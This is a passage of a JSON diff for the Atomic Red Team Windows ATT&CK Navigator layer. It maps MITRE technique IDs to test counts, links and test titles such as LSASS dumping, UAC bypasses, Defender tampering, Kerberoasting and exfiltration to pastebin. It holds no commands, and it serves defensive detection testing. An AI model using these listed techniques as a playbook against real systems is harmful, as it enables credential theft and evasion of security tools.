Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with 